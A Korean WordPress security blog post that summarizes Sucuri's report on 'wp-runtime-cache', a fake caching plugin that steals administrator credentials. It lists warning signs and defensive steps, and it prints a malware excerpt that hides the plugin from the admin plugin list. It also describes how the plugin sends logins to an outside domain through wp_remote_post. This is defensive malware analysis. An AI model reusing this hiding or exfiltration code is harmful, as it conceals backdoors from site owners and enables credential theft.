워드프레스는 보안에 강한 편이지만 업데이트를 소홀히 하거나 보안 취약점이 있는 워드프레스 버전이나 테마, 플러그인을 사용하는 경우 사이트가 악성코드에 감염되거나 해킹을 당할 수 있습니다.
최근에는 정상적인 플러그인으로 위장하여 관리자 계정을 탈취하는 멀웨어가 증가하는 추세 같습니다. 얼마 전 보안 전문업체인 Wordfence는 블로그 글을 통해 합법적인 워드프레스 플러그인으로 위장하는 악성코드에 대하여 공개했습니다.
유명한 보안 전문업체인 Sucuri는 Fake WordPress Caching Plugin Used to Steal Admin Credentials이라는 블로그 글을 통해 관계자 계정 정보를 탈취하는 가짜 워드프레스 캐싱 플러그인 사례를 소개했습니다. 이 글에서는 캐싱 플러그인을 사칭한 멀웨어와 대응 방법 등에 대하여 살펴보겠습니다.
워드프레스 캐싱 플러그인 사칭 멀웨어 주의 – 관리자 계정 탈취 사례
멀웨어에 감염되면 이상한 이름의 파일이나 폴더가 서버에 생성되어 있는 경우가 많습니다.
그리고 사이트 속도가 느려질 수 있고, 이상한 팝업이 표시되거나 스팸 사이트로 리디렉션이 흔히 발생합니다.
과거에는 멀웨어에 감염되면 이상한 이름의 플러그인이 설치되어 있는 경우가 종종 있었지만, 근래 들어서는 그럴듯한 이름으로 정상적인 플러그인을 위장하는 추세로 바뀌고 있는 것 같습니다.
Sucuri가 공개한 'wp-runtime-cache' 플러그인의 정체
Sucuri는 블로그 글을 통해 캐싱 플러그인을 사칭한 멀웨어 사례를 공개했습니다.
워드프레스 보안 스캔 도중 wp-content/plugins 디렉터리에서 wp-runtime-cache라는 플러그인이 발견되었다고 합니다. 일반적인 캐싱 플러그인처럼 보이지만, 이 플러그인은 다음과 같은 몇 가지 이상한 점들이 있었습니다.
- 설정 메뉴 없음: 일반 캐싱 플러그인과 달리 관리자 페이지(워드프레스 알림판)에 관련 메뉴가 전혀 없습니다.
- 설치 플러그인 목록에서 비노출: 관리자 화면의 설치된 플러그인 목록에 해당 플러그인이 표시되지 않습니다.
- 단일 파일 구조: wp-runtime-cache.php 파일 하나만 존재하며, 일반적인 플러그인처럼 다수의 파일을 포함하지 않음
- 기본 정보 없음: 플러그인 설명, 제작자, 웹사이트 정보가 모두 비어 있음
- base64 인코딩과 난수형 변수 사용: 일반적인 플러그인에서는 보기 힘든 난독화(obfuscation) 기법 사용.
워드프레스 캐시 플러그인인 경우 설치하면 관리자 페이지에 설정 메뉴가 추가됩니다. 예를 들어, 아래는 LiteSpeed Cache라는 인기 워드프레스 캐시 플러그인의 예시인데요. 활성화할 경우 그림과 같이 LiteSpeed Cache 메뉴가 설정 아래에 추가되어 세부적인 설정을 할 수 있습니다.
캐시 플러그인이지만 이런 설정 메뉴가 없다면 의심을 해 보아야 합니다.
또한, 멀웨어 플러그인의 특성 중 하나는 관리자 페이지의 플러그인 목록에 해당 플러그인이 표시되지 않는다는 점입니다. 이는 최근 트렌드인 것 같습니다. 예전에는 멀웨어 플러그인이 플러그인이 목록에 표시되는 경우가 많았지만, 요즘은 관리자 페이지에 표시되지 않도록 숨기는 추세입니다.
그리고 플러그인이나 테마 파일에 base64 인코딩이 사용되었다면 악성코드로 의심할 수 있습니다.
내부 작동 방식: 관리자 로그인 정보 탈취
해당 플러그인은 로그인 시 워드프레스 후크인 wp_login에 octopusJson50286이라는 함수를 연결하여 다음을 수행합니다:
- 사용자 이름과 역할(capability) 수집
- 사용자 역할 검사: base64로 인코딩된 값(manage_options, edit_pages)으로 관리자인지 편집자(Editor)인지 판단
- 관리자/편집자일 경우 데이터 전송: 사용자 정보(아이디, 비밀번호 등)를 외부 서버(https://woocommerce-check[.]com/report-to)로 wp_remote_post()를 통해 전송
워드프레스 내장 기능을 악용하여 정상적인 함수처럼 위장한 공격입니다.
악성 코드 예시:
function pbes2PITR0339C()
{
global $current_user;
$username = $current_user->user_login;
if ($username == detachConcurrency0788()) {
return;
}
if (!is_plugin_active('wp-runtime-cache/wp-runtime-cache.php')) {
return;
}
global $wp_list_table;
$hidearr = array('wp-runtime-cache/wp-runtime-cache.php');
$myplugins = $wp_list_table->items;
foreach ($myplugins as $key => $val) {
if (in_array($key, $hidearr)) {
unset($wp_list_table->items[$key]);
}
}
}
function detachConcurrency0788()
{
$sa = 'WsXZjIFxgnLnC5V';
$s = get_site_url(null, '', 'https');
return substr(hash('sha256', $s.$sa), -8);
}Sucuri에서 공개한 코드의 예시인데요. 위의 코드는 워드프레스 관리자 페이지 화면에서 해당 악성 플러그인을 숨기기 위한 로직으로 되어 있습니다.
상기 코드에서 pbes2PITR0339C() 함수가 wp-runtime-cache/wp-runtime-cache.php라는 플러그인을 플러그인 목록에서 숨기는 기능을 합니다.
대처 및 예방 방법
워드프레스, 테마, 플러그인을 항상 최신 버전으로 업데이트하여 최신 상태로 유지하는 것이 중요합니다. 또한, 정기적으로 백업하여 백업본을 PC나 클라우드 스토리지에 보관하는 것이 안전합니다.
공식적인 플러그인으로 위장하여 설치되는 악성 플러그인을 감지하기 위해서는...
- 정기적으로 플러그인 목록을 검토하고
- FTP/SFTP를 통해 서버에 접속하여 실제 디렉터리 내에 설치하지 않은 이상한 플러그인이 존재하지 않는지 확인하는 것이 좋습니다.
또한, 사용자 리스트에 이상한 관리자가 있는지도 확인하시기 바랍니다. 경우에 따라 사용자 목록에 악성 사용자가 표시되지 않을 수 있습니다. 그런 경우 phpMyAdmin 등 DB 클라이언트 툴을 사용하여 데이터베이스에 접속하여 사용자 목록을 확인할 수 있습니다.
마치며
워드프레스 사이트가 멀웨어에 감염되어 낭패를 보는 분들을 종종 접합니다. 기본적인 보안 관행을 준수하면 안전하게 사이트를 운영할 수 있습니다.
- 워드프레스 코어, 테마, 플러그인을 최신 버전으로 업데이트
- 오랫동안 업데이트가 안 되는 플러그인은 삭제
- 보안 취약점이 발견된 테마나 플러그인은 최신 버전으로 즉시 업데이트하거나 (업데이트가 없는 경우) 삭제
- 정기적인 백업
- 보안 플러그인 설치
플러그인은 가능하면 꼭 필요한 것만 설치하여 운영하는 것이 바람직합니다. 그리고 테마와 플러그인은 자동 업데이트가 되도록 설정하는 것이 좋습니다.
클라우드웨이즈(Cloudways)를 이용하는 경우 정기적으로 사이트를 스캔하여 보안 취약점이 발견된 워드프레스 코어, 테마, 플러그인을 사용하고 있다면 경고 메일을 보냅니다. 예를 들어, 최근 Crawlomatic과 Auto Spinner라는 플러그인이 보안 취약점이 발견되어 최신 버전으로 업데이트되었습니다. 제 블로그 중 하나에 이 두 플러그인이 설치되어 있었는데, 보안 취약점이 발견되었으니 업데이트하라는 메일을 클라우드웨이즈에서 보내왔습니다("워드프레스 Crawlomatic 및 Auto Spinner 플러그인 보안 취약점 발견" 참고).
👉 워드프레스 멀웨어 감염을 비롯하여 워드프레스 또는 웹호스팅 관련 문제로 해결에 어려움을 겪는 경우 여기에서 서비스(유료)를 의뢰하실 수 있습니다.
댓글 남기기